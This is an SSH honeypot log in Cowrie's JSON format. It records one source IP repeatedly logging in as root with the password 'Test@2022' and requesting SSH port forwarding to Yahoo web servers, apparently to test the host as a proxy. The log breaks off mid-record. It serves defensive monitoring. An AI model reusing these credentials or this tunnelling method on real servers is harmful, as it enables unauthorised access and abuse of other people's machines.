{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.783653Z","src_ip":"213.209.150.239","session":"925097051d9e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:29.840553Z","src_ip":"213.209.150.239","session":"925097051d9e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.123417Z","src_ip":"213.209.150.239","session":"925097051d9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":27167,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:27167","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.181068Z","session":"925097051d9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.237824Z","src_ip":"213.209.150.239","session":"925097051d9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":31987,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:31987","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.394985Z","session":"925097051d9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.451772Z","src_ip":"213.209.150.239","session":"925097051d9e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.509415Z","src_ip":"213.209.150.239","session":"925097051d9e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23134,"dst_ip":"1.2.3.4","dst_port":22,"session":"d74d8a00243b","protocol":"ssh","message":"New connection: 213.209.150.239:23134 (1.2.3.4:22) [session: d74d8a00243b]","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.555911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.557021Z","src_ip":"213.209.150.239","session":"d74d8a00243b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.604327Z","src_ip":"213.209.150.239","session":"d74d8a00243b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.839645Z","src_ip":"213.209.150.239","session":"d74d8a00243b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":3084,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:3084","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.888613Z","session":"d74d8a00243b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:30.936270Z","src_ip":"213.209.150.239","session":"d74d8a00243b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":11077,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11077","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.073751Z","session":"d74d8a00243b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.121381Z","src_ip":"213.209.150.239","session":"d74d8a00243b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.169602Z","src_ip":"213.209.150.239","session":"d74d8a00243b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23187,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7fd4bb783e8","protocol":"ssh","message":"New connection: 213.209.150.239:23187 (1.2.3.4:22) [session: e7fd4bb783e8]","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.225062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.225767Z","src_ip":"213.209.150.239","session":"e7fd4bb783e8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.282589Z","src_ip":"213.209.150.239","session":"e7fd4bb783e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.564835Z","src_ip":"213.209.150.239","session":"e7fd4bb783e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":16145,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:16145","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.622237Z","session":"e7fd4bb783e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.678932Z","src_ip":"213.209.150.239","session":"e7fd4bb783e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":11971,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11971","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.838885Z","session":"e7fd4bb783e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.895520Z","src_ip":"213.209.150.239","session":"e7fd4bb783e8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:31.953105Z","src_ip":"213.209.150.239","session":"e7fd4bb783e8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23240,"dst_ip":"1.2.3.4","dst_port":22,"session":"673472176cdf","protocol":"ssh","message":"New connection: 213.209.150.239:23240 (1.2.3.4:22) [session: 673472176cdf]","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.009057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.011042Z","src_ip":"213.209.150.239","session":"673472176cdf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.067628Z","src_ip":"213.209.150.239","session":"673472176cdf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.350863Z","src_ip":"213.209.150.239","session":"673472176cdf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":5693,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:5693","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.408776Z","session":"673472176cdf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.465820Z","src_ip":"213.209.150.239","session":"673472176cdf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":23046,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:23046","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.623248Z","session":"673472176cdf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.679992Z","src_ip":"213.209.150.239","session":"673472176cdf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.738437Z","src_ip":"213.209.150.239","session":"673472176cdf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23286,"dst_ip":"1.2.3.4","dst_port":22,"session":"6eb122e1b536","protocol":"ssh","message":"New connection: 213.209.150.239:23286 (1.2.3.4:22) [session: 6eb122e1b536]","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.793880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.794624Z","src_ip":"213.209.150.239","session":"6eb122e1b536"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:32.851375Z","src_ip":"213.209.150.239","session":"6eb122e1b536"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.133516Z","src_ip":"213.209.150.239","session":"6eb122e1b536"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":22801,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22801","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.191400Z","session":"6eb122e1b536"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.248185Z","src_ip":"213.209.150.239","session":"6eb122e1b536"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":4541,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4541","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.402973Z","session":"6eb122e1b536"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.459579Z","src_ip":"213.209.150.239","session":"6eb122e1b536"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.516819Z","src_ip":"213.209.150.239","session":"6eb122e1b536"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23342,"dst_ip":"1.2.3.4","dst_port":22,"session":"11a30ba288c7","protocol":"ssh","message":"New connection: 213.209.150.239:23342 (1.2.3.4:22) [session: 11a30ba288c7]","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.563110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.563896Z","src_ip":"213.209.150.239","session":"11a30ba288c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hma